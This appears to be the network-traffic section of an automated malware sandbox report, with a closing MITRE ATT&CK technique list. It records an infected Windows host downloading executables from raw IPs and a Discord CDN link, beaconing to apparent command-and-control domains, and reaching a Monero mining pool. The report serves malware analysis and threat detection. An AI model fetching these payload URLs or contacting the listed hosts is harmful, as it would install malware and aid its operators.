Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:08:16 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lkJveaMC2PaYZqfjJW5sPp4uAblYdm1r5DO5jpfxhbKnP2OwnAInE%2BkWBatP%2FPx1gY6CsHOSmY%2FCgCB1Yk6FaklaNfbdAgtQn98ud312yZ3sjiY4RwVwJGD0jWuYo6M%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 82793b3fdb1b6710-AMS
POST

http://keewoolas.pw/api

Remote address:

172.67.219.233:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=RD6EDNXm0q8Dtg80WUbH.owAo5asj7nPQErmoLMdjGk-1700237294-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 527
Host: keewoolas.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:08:17 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=5djgki1tcti8f4bqkb3f37qpm3; expires=Tue, 12 Mar 2024 09:54:56 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:08:17 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LwUsu34qW4TY9AcNOITJMxSI6NZYtKGznTbAouQpTCfwnj3DaHH6L00qCIelH2IJJZDd1055Ob8N3vywdJYA0mbKTMZ8MsBH6yxegv4qLyMyRPfARXCyRSKUrMEMXKw%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 82793b43cc15416c-AMS
POST

http://keewoolas.pw/api

Remote address:

172.67.219.233:80

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
Cookie: __cf_mw_byp=RD6EDNXm0q8Dtg80WUbH.owAo5asj7nPQErmoLMdjGk-1700237294-0-/api
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Content-Length: 527
Host: keewoolas.pw

Response

HTTP/1.1 200 OK

Date: Fri, 17 Nov 2023 16:08:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/8.2.7
Set-Cookie: PHPSESSID=h0vjp9qgjak3ffkrgnrr3vaa1q; expires=Tue, 12 Mar 2024 09:54:57 GMT; Max-Age=9999999; path=/
Set-Cookie: xdober_setting_show_country=1; expires=Tue, 16 Jan 2024 16:08:18 GMT; Max-Age=5184000; path=/
Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3HfinNGl%2Bt%2F9bt0vfPDyMcAxrGh5Ubra1bq%2Br%2F%2Bjt%2FihZEuJ6NgZGdUTagVKISh7yWYzcpXa1BtbjPJC8yBygZOo56oLhrKDJop0zRym45iEhJxAYrr5tocCfII%2FaL4%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 82793b476e716574-AMS

194.49.94.152:50500

AppLaunch.exe

260 B
5
194.49.94.152:19053

AppLaunch.exe

260 B
5
5.42.92.190:80

http://5.42.92.190/fks/index.php

http

Explorer.EXE

1.4kB
841 B
9
9

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404
5.42.65.80:80

http://5.42.65.80/newrock.exe

http

Explorer.EXE

284.8kB
13.6MB
5741
10120

HTTP Request

GET http://5.42.65.80/newrock.exe

HTTP Response

200
194.49.94.152:50500

AppLaunch.exe

260 B
5
5.42.92.190:80

http://5.42.92.190/fks/index.php

http

Explorer.EXE

7.0kB
105.9kB
62
97

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404
194.49.94.72:80

http://194.49.94.72/1.exe

http

Explorer.EXE

5.3kB
293.0kB
112
214

HTTP Request

GET http://194.49.94.72/1.exe

HTTP Response

200
194.49.94.145:80

http://194.49.94.145/traffico.exe

http

Explorer.EXE

8.6kB
467.7kB
181
338

HTTP Request

GET http://194.49.94.145/traffico.exe

HTTP Response

200
194.49.94.152:19053

AppLaunch.exe

260 B
5
194.49.94.120:80

http://194.49.94.120/TrueCrypt_lDwnwJ.exe

http

Explorer.EXE

358.1kB
18.9MB
7285
13527

HTTP Request

GET http://194.49.94.120/TrueCrypt_lDwnwJ.exe

HTTP Response

200
194.49.94.11:80

http://194.49.94.11/

http

23C0.exe

3.7MB
24.3kB
2680
375

HTTP Request

POST http://194.49.94.11/

HTTP Response

200

HTTP Request

POST http://194.49.94.11/

HTTP Response

200

HTTP Request

POST http://194.49.94.11/

HTTP Response

200

HTTP Request

POST http://194.49.94.11/

HTTP Response

200
172.67.75.172:443

https://api.ip.sb/geoip

tls, http

23C0.exe

713 B
4.2kB
8
7

HTTP Request

GET https://api.ip.sb/geoip

HTTP Response

200
194.49.94.152:50500

AppLaunch.exe

260 B
5
194.49.94.152:19053

AppLaunch.exe

260 B
5
5.42.92.190:80

http://5.42.92.190/fks/index.php

http

Explorer.EXE

1.4kB
1.3kB
9
9

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404
194.49.94.120:80

http://194.49.94.120/TrueCrypt_vlBfql.exe

http

Explorer.EXE

309.6kB
17.4MB
6490
12431

HTTP Request

GET http://194.49.94.120/TrueCrypt_vlBfql.exe

HTTP Response

200
194.49.94.152:50500

AppLaunch.exe

260 B
5
172.67.207.245:80

http://knittinprophec.pw/api

http

ADelRCP.exe

1.5kB
2.7kB
9
9

HTTP Request

POST http://knittinprophec.pw/api

HTTP Response

200

HTTP Request

POST http://knittinprophec.pw/api

HTTP Response

200
172.67.207.245:80

http://knittinprophec.pw/api

http

ADelRCP.exe

1.2kB
18.8kB
19
17

HTTP Request

POST http://knittinprophec.pw/api

HTTP Response

200
172.67.207.245:80

http://knittinprophec.pw/api

http

ADelRCP.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://knittinprophec.pw/api

HTTP Response

200
172.67.207.245:80

http://knittinprophec.pw/api

http

ADelRCP.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://knittinprophec.pw/api

HTTP Response

200
5.42.92.190:80

http://5.42.92.190/fks/index.php

http

Explorer.EXE

26.7kB
1.2MB
471
889

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404
172.67.207.245:80

http://knittinprophec.pw/api

http

ADelRCP.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://knittinprophec.pw/api

HTTP Response

200
172.67.207.245:80

http://knittinprophec.pw/api

http

ADelRCP.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://knittinprophec.pw/api

HTTP Response

200
172.67.207.245:80

http://knittinprophec.pw/api

http

ADelRCP.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://knittinprophec.pw/api

HTTP Response

200
172.67.207.245:80

http://knittinprophec.pw/api

http

ADelRCP.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://knittinprophec.pw/api

HTTP Response

200
172.67.207.245:80

http://knittinprophec.pw/api

http

ADelRCP.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://knittinprophec.pw/api

HTTP Response

200
172.67.207.245:80

http://knittinprophec.pw/api

http

ADelRCP.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://knittinprophec.pw/api

HTTP Response

200
172.67.207.245:80

http://knittinprophec.pw/api

http

ADelRCP.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://knittinprophec.pw/api

HTTP Response

200
172.67.207.245:80

http://knittinprophec.pw/api

http

ADelRCP.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://knittinprophec.pw/api

HTTP Response

200
162.159.129.233:443

https://cdn.discordapp.com/attachments/1149095701733724203/1174025624365584404/Chlen.exe

tls, http

Explorer.EXE

30.5kB
1.8MB
651
1287

HTTP Request

GET https://cdn.discordapp.com/attachments/1149095701733724203/1174025624365584404/Chlen.exe

HTTP Response

200
172.67.207.245:80

http://knittinprophec.pw/api

http

ADelRCP.exe

30.3kB
1.5kB
26
10

HTTP Request

POST http://knittinprophec.pw/api

HTTP Response

200
194.169.175.235:42691

E14B.exe

1.4MB
22.4kB
1038
396
172.67.207.245:80

http://knittinprophec.pw/api

http

ADelRCP.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://knittinprophec.pw/api

HTTP Response

200
172.67.207.245:80

http://knittinprophec.pw/api

http

ADelRCP.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://knittinprophec.pw/api

HTTP Response

200
172.67.207.245:80

http://knittinprophec.pw/api

http

ADelRCP.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://knittinprophec.pw/api

HTTP Response

200
172.67.207.245:80

http://knittinprophec.pw/api

http

ADelRCP.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://knittinprophec.pw/api

HTTP Response

200
172.67.207.245:80

http://knittinprophec.pw/api

http

ADelRCP.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://knittinprophec.pw/api

HTTP Response

200
172.67.207.245:80

http://knittinprophec.pw/api

http

ADelRCP.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://knittinprophec.pw/api

HTTP Response

200
95.214.26.28:80

http://host-host-file8.com/

http

Explorer.EXE

754 B
362 B
6
4

HTTP Request

POST http://host-host-file8.com/

HTTP Response

200
172.67.207.245:80

http://knittinprophec.pw/api

http

ADelRCP.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://knittinprophec.pw/api

HTTP Response

200
194.49.94.152:19053

AppLaunch.exe

260 B
5
172.67.207.245:80

http://knittinprophec.pw/api

http

ADelRCP.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://knittinprophec.pw/api

HTTP Response

200
172.67.207.245:80

http://knittinprophec.pw/api

http

ADelRCP.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://knittinprophec.pw/api

HTTP Response

200
172.67.207.245:80

http://knittinprophec.pw/api

http

ADelRCP.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://knittinprophec.pw/api

HTTP Response

200
194.49.94.152:50500

AppLaunch.exe

260 B
5
172.67.207.245:80

http://knittinprophec.pw/api

http

ADelRCP.exe

14.1kB
1.4kB
15
7

HTTP Request

POST http://knittinprophec.pw/api

HTTP Response

200
172.67.207.245:80

http://knittinprophec.pw/api

http

ADelRCP.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://knittinprophec.pw/api

HTTP Response

200
172.67.207.245:80

http://knittinprophec.pw/api

http

1.1kB
1.4kB
6
5

HTTP Request

POST http://knittinprophec.pw/api

HTTP Response

200
172.67.207.245:80

http://knittinprophec.pw/api

http

1.1kB
1.4kB
6
5

HTTP Request

POST http://knittinprophec.pw/api

HTTP Response

200
172.67.207.245:80

http://knittinprophec.pw/api

http

1.1kB
1.4kB
6
5

HTTP Request

POST http://knittinprophec.pw/api

HTTP Response

200
172.67.207.245:80

http://knittinprophec.pw/api

http

1.1kB
1.4kB
6
5

HTTP Request

POST http://knittinprophec.pw/api

HTTP Response

200
172.67.207.245:80

http://knittinprophec.pw/api

http

18.9kB
1.7kB
19
14

HTTP Request

POST http://knittinprophec.pw/api

HTTP Response

200
172.67.207.245:80

http://knittinprophec.pw/api

http

1.1kB
1.4kB
6
5

HTTP Request

POST http://knittinprophec.pw/api

HTTP Response

200
172.67.207.245:80

http://knittinprophec.pw/api

http

1.1kB
1.4kB
6
5

HTTP Request

POST http://knittinprophec.pw/api

HTTP Response

200
172.67.207.245:80

http://knittinprophec.pw/api

http

1.1kB
1.4kB
6
5

HTTP Request

POST http://knittinprophec.pw/api

HTTP Response

200
172.67.207.245:80

http://knittinprophec.pw/api

http

1.1kB
1.4kB
6
5

HTTP Request

POST http://knittinprophec.pw/api

HTTP Response

200
172.67.207.245:80

http://knittinprophec.pw/api

http

1.1kB
1.4kB
6
5

HTTP Request

POST http://knittinprophec.pw/api

HTTP Response

200
172.67.207.245:80

http://knittinprophec.pw/api

http

1.1kB
1.4kB
6
5

HTTP Request

POST http://knittinprophec.pw/api

HTTP Response

200
172.67.207.245:80

http://knittinprophec.pw/api

http

1.1kB
1.4kB
6
5

HTTP Request

POST http://knittinprophec.pw/api

HTTP Response

200
172.67.207.245:80

http://knittinprophec.pw/api

http

1.1kB
1.4kB
6
5

HTTP Request

POST http://knittinprophec.pw/api

HTTP Response

200
172.67.207.245:80

http://knittinprophec.pw/api

http

1.5kB
1.3kB
6
5

HTTP Request

POST http://knittinprophec.pw/api

HTTP Response

200
172.67.207.245:80

http://knittinprophec.pw/api

http

197.7kB
4.2kB
146
77

HTTP Request

POST http://knittinprophec.pw/api

HTTP Response

200
45.33.118.219:35633

1.4MB
22.0kB
1040
372
172.67.207.245:80

http://knittinprophec.pw/api

http

2.1kB
1.4kB
7
6

HTTP Request

POST http://knittinprophec.pw/api

HTTP Response

200
194.49.94.152:50500

260 B
5
194.49.94.152:19053

260 B
5
104.21.79.229:443

2no.co

tls

847 B
6.9kB
11
9
142.251.39.100:80

http://www.google.com/

http

1.0kB
21.0kB
20
19

HTTP Request

GET http://www.google.com/

HTTP Response

200
91.92.247.247:39001

442 B
720 B
7
6
204.79.197.200:443

tse1.mm.bing.net

tls

226.9kB
6.7MB
4833
4820
204.79.197.200:443

tse1.mm.bing.net

tls

1.2kB
8.3kB
15
14
204.79.197.200:443

tse1.mm.bing.net

tls

1.2kB
8.3kB
15
14
204.79.197.200:443

tse1.mm.bing.net

tls

1.2kB
8.3kB
15
14
162.159.129.233:443

cdn.discordapp.com

tls

172.0kB
7.0MB
3443
5070
185.82.216.96:443

server7.filesdumpplace.org

tls

1.4kB
6.6kB
14
17
188.114.97.0:443

walkinglate.com

tls

51.4kB
2.2MB
954
1593
195.10.205.16:1056

1.4MB
20.1kB
1046
341
193.218.118.182:9001

www.msiobhhcfz47fr27.com

tls

48.7kB
749.3kB
486
562
181.215.226.65:443

www.74x5yl.com

tls

376.6kB
4.0MB
2825
2949
46.229.55.118:9001

www.k3he6y4quchctg.com

tls

749.7kB
8.3MB
5099
6141
51.15.193.130:14433

xmr-eu1.nanopool.org

tls

1.4kB
3.4kB
9
8
185.82.216.96:443

server7.filesdumpplace.org

tls

1.3kB
6.2kB
12
14
172.67.34.170:443

pastebin.com

tls

1.0kB
6.0kB
11
11
51.68.143.81:14433

xmr-eu1.nanopool.org

tls

1.4kB
3.8kB
9
8
194.49.94.152:50500

208 B
4
181.215.226.65:443

www.5hqj22smyesqs4ky2vvo67zt.com

tls

7.4kB
9.2kB
20
25
46.229.55.118:9001

www.kzqfzv7f.com

tls

5.5kB
7.2kB
15
15
194.49.94.152:19053

208 B
4
172.67.219.233:80

http://keewoolas.pw/api

http

1.6kB
6.9kB
11
11

HTTP Request

POST http://keewoolas.pw/api

HTTP Response

200

HTTP Request

POST http://keewoolas.pw/api

HTTP Response

200
172.67.219.233:80

http://keewoolas.pw/api

http

1.2kB
18.8kB
18
17

HTTP Request

POST http://keewoolas.pw/api

HTTP Response

200
144.76.136.153:443

transfer.sh

tls

979 B
5.8kB
13
11
172.67.219.233:80

http://keewoolas.pw/api

http

1.2kB
1.4kB
6
5

HTTP Request

POST http://keewoolas.pw/api

HTTP Response

200
172.67.219.233:80

http://keewoolas.pw/api

http

1.2kB
1.4kB
6
5

HTTP Request

POST http://keewoolas.pw/api

HTTP Response

200
172.67.219.233:80

http://keewoolas.pw/api

http

1.2kB
1.4kB
6
5

HTTP Request

POST http://keewoolas.pw/api

HTTP Response

200
172.67.219.233:80

http://keewoolas.pw/api

http

1.2kB
1.3kB
6
5

HTTP Request

POST http://keewoolas.pw/api

HTTP Response

200
172.67.219.233:80

http://keewoolas.pw/api

http

1.1kB
1.4kB
4
6

HTTP Request

POST http://keewoolas.pw/api

HTTP Response

200

8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

71.31.126.40.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

71.31.126.40.in-addr.arpa
8.8.8.8:53

254.105.26.67.in-addr.arpa

dns

72 B
126 B
1
1

DNS Request

254.105.26.67.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

241.154.82.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

241.154.82.20.in-addr.arpa
8.8.8.8:53

146.78.124.51.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

146.78.124.51.in-addr.arpa
8.8.8.8:53

198.1.85.104.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

198.1.85.104.in-addr.arpa
8.8.8.8:53

2.136.104.51.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

2.136.104.51.in-addr.arpa
8.8.8.8:53

208.194.73.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

208.194.73.20.in-addr.arpa
8.8.8.8:53

26.165.165.52.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

26.165.165.52.in-addr.arpa
8.8.8.8:53

190.92.42.5.in-addr.arpa

dns

70 B
107 B
1
1

DNS Request

190.92.42.5.in-addr.arpa
8.8.8.8:53

80.65.42.5.in-addr.arpa

dns

69 B
129 B
1
1

DNS Request

80.65.42.5.in-addr.arpa
8.8.8.8:53

15.164.165.52.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

15.164.165.52.in-addr.arpa
8.8.8.8:53

254.111.26.67.in-addr.arpa

dns

72 B
126 B
1
1

DNS Request

254.111.26.67.in-addr.arpa
8.8.8.8:53

72.94.49.194.in-addr.arpa

dns

71 B
131 B
1
1

DNS Request

72.94.49.194.in-addr.arpa
8.8.8.8:53

145.94.49.194.in-addr.arpa

dns

72 B
132 B
1
1

DNS Request

145.94.49.194.in-addr.arpa
8.8.8.8:53

120.94.49.194.in-addr.arpa

dns

72 B
132 B
1
1

DNS Request

120.94.49.194.in-addr.arpa
8.8.8.8:53

11.94.49.194.in-addr.arpa

dns

71 B
131 B
1
1

DNS Request

11.94.49.194.in-addr.arpa
8.8.8.8:53

api.ip.sb

dns

55 B
145 B
1
1

DNS Request

api.ip.sb

DNS Response

172.67.75.172

104.26.12.31

104.26.13.31
8.8.8.8:53

172.75.67.172.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

172.75.67.172.in-addr.arpa
8.8.8.8:53

57.169.31.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

57.169.31.20.in-addr.arpa
8.8.8.8:53

knittinprophec.pw

dns

ADelRCP.exe

63 B
95 B
1
1

DNS Request

knittinprophec.pw

DNS Response

172.67.207.245

104.21.58.216
8.8.8.8:53

knittinprophec.pw

dns

ADelRCP.exe

63 B
95 B
1
1

DNS Request

knittinprophec.pw

DNS Response

172.67.207.245

104.21.58.216
8.8.8.8:53

245.207.67.172.in-addr.arpa

dns

73 B
135 B
1
1

DNS Request

245.207.67.172.in-addr.arpa
8.8.8.8:53

11.227.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

11.227.111.52.in-addr.arpa
8.8.8.8:53

cdn.discordapp.com

dns

64 B
144 B
1
1

DNS Request

cdn.discordapp.com

DNS Response

162.159.129.233

162.159.133.233

162.159.134.233

162.159.135.233

162.159.130.233
8.8.8.8:53

233.129.159.162.in-addr.arpa

dns

74 B
136 B
1
1

DNS Request

233.129.159.162.in-addr.arpa
8.8.8.8:53

235.175.169.194.in-addr.arpa

dns

74 B
135 B
1
1

DNS Request

235.175.169.194.in-addr.arpa
8.8.8.8:53

host-file-host6.com

dns

65 B
138 B
1
1

DNS Request

host-file-host6.com
8.8.8.8:53

host-host-file8.com

dns

65 B
81 B
1
1

DNS Request

host-host-file8.com

DNS Response

95.214.26.28
8.8.8.8:53

28.26.214.95.in-addr.arpa

dns

71 B
132 B
1
1

DNS Request

28.26.214.95.in-addr.arpa
8.8.8.8:53

8a202e98-6662-4b45-82d3-a54220c1a288.uuid.filesdumpplace.org

dns

106 B
179 B
1
1

DNS Request

8a202e98-6662-4b45-82d3-a54220c1a288.uuid.filesdumpplace.org
8.8.8.8:53

219.118.33.45.in-addr.arpa

dns

72 B
124 B
1
1

DNS Request

219.118.33.45.in-addr.arpa
8.8.8.8:53

2no.co

dns

52 B
84 B
1
1

DNS Request

2no.co

DNS Response

104.21.79.229

172.67.149.76
8.8.8.8:53

229.79.21.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

229.79.21.104.in-addr.arpa
8.8.8.8:53

35.36.251.142.in-addr.arpa

dns

72 B
110 B
1
1

DNS Request

35.36.251.142.in-addr.arpa
8.8.8.8:53

jTKrwQUFbloAgdx.jTKrwQUFbloAgdx

dns

77 B
152 B
1
1

DNS Request

jTKrwQUFbloAgdx.jTKrwQUFbloAgdx
8.8.8.8:53

100.39.251.142.in-addr.arpa

dns

73 B
111 B
1
1

DNS Request

100.39.251.142.in-addr.arpa
8.8.8.8:53

tse1.mm.bing.net

dns

62 B
173 B
1
1

DNS Request

tse1.mm.bing.net

DNS Response

204.79.197.200

13.107.21.200
8.8.8.8:53

247.247.92.91.in-addr.arpa

dns

72 B
132 B
1
1

DNS Request

247.247.92.91.in-addr.arpa
8.8.8.8:53

server7.filesdumpplace.org

dns

72 B
88 B
1
1

DNS Request

server7.filesdumpplace.org

DNS Response

185.82.216.96
8.8.8.8:53

stun1.l.google.com

dns

64 B
80 B
1
1

DNS Request

stun1.l.google.com

DNS Response

64.233.164.127
64.233.164.127:19302

stun1.l.google.com

48 B
60 B
1
1
8.8.8.8:53

walkinglate.com

dns

61 B
93 B
1
1

DNS Request

walkinglate.com

DNS Response

188.114.97.0

188.114.96.0
8.8.8.8:53

127.164.233.64.in-addr.arpa

dns

73 B
107 B
1
1

DNS Request

127.164.233.64.in-addr.arpa
8.8.8.8:53

96.216.82.185.in-addr.arpa

dns

72 B
135 B
1
1

DNS Request

96.216.82.185.in-addr.arpa
8.8.8.8:53

0.97.114.188.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

0.97.114.188.in-addr.arpa
8.8.8.8:53

16.205.10.195.in-addr.arpa

dns

72 B
132 B
1
1

DNS Request

16.205.10.195.in-addr.arpa
8.8.8.8:53

182.118.218.193.in-addr.arpa

dns

74 B
115 B
1
1

DNS Request

182.118.218.193.in-addr.arpa
8.8.8.8:53

65.226.215.181.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

65.226.215.181.in-addr.arpa
8.8.8.8:53

118.55.229.46.in-addr.arpa

dns

72 B
111 B
1
1

DNS Request

118.55.229.46.in-addr.arpa
8.8.8.8:53

xmr-eu1.nanopool.org

dns

66 B
210 B
1
1

DNS Request

xmr-eu1.nanopool.org

DNS Response

163.172.154.142

212.47.253.124

51.15.193.130

51.68.143.81

51.15.65.182

51.255.34.118

135.125.238.108

51.15.58.224

51.68.190.80
8.8.8.8:53

server7.filesdumpplace.org

dns

72 B
88 B
1
1

DNS Request

server7.filesdumpplace.org

DNS Response

185.82.216.96
8.8.8.8:53

130.193.15.51.in-addr.arpa

dns

72 B
119 B
1
1

DNS Request

130.193.15.51.in-addr.arpa
8.8.8.8:53

pastebin.com

dns

58 B
106 B
1
1

DNS Request

pastebin.com

DNS Response

172.67.34.170

104.20.68.143

104.20.67.143
8.8.8.8:53

170.34.67.172.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

170.34.67.172.in-addr.arpa
8.8.8.8:53

81.143.68.51.in-addr.arpa

dns

71 B
109 B
1
1

DNS Request

81.143.68.51.in-addr.arpa
8.8.8.8:53

15.173.189.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

15.173.189.20.in-addr.arpa
8.8.8.8:53

keewoolas.pw

dns

58 B
90 B
1
1

DNS Request

keewoolas.pw

DNS Response

172.67.219.233

104.21.24.188
8.8.8.8:53

transfer.sh

dns

57 B
73 B
1
1

DNS Request

transfer.sh

DNS Response

144.76.136.153
8.8.8.8:53

233.219.67.172.in-addr.arpa

dns

73 B
135 B
1
1

DNS Request

233.219.67.172.in-addr.arpa
8.8.8.8:53

153.136.76.144.in-addr.arpa

dns

73 B
98 B
1
1

DNS Request

153.136.76.144.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

System Information Discovery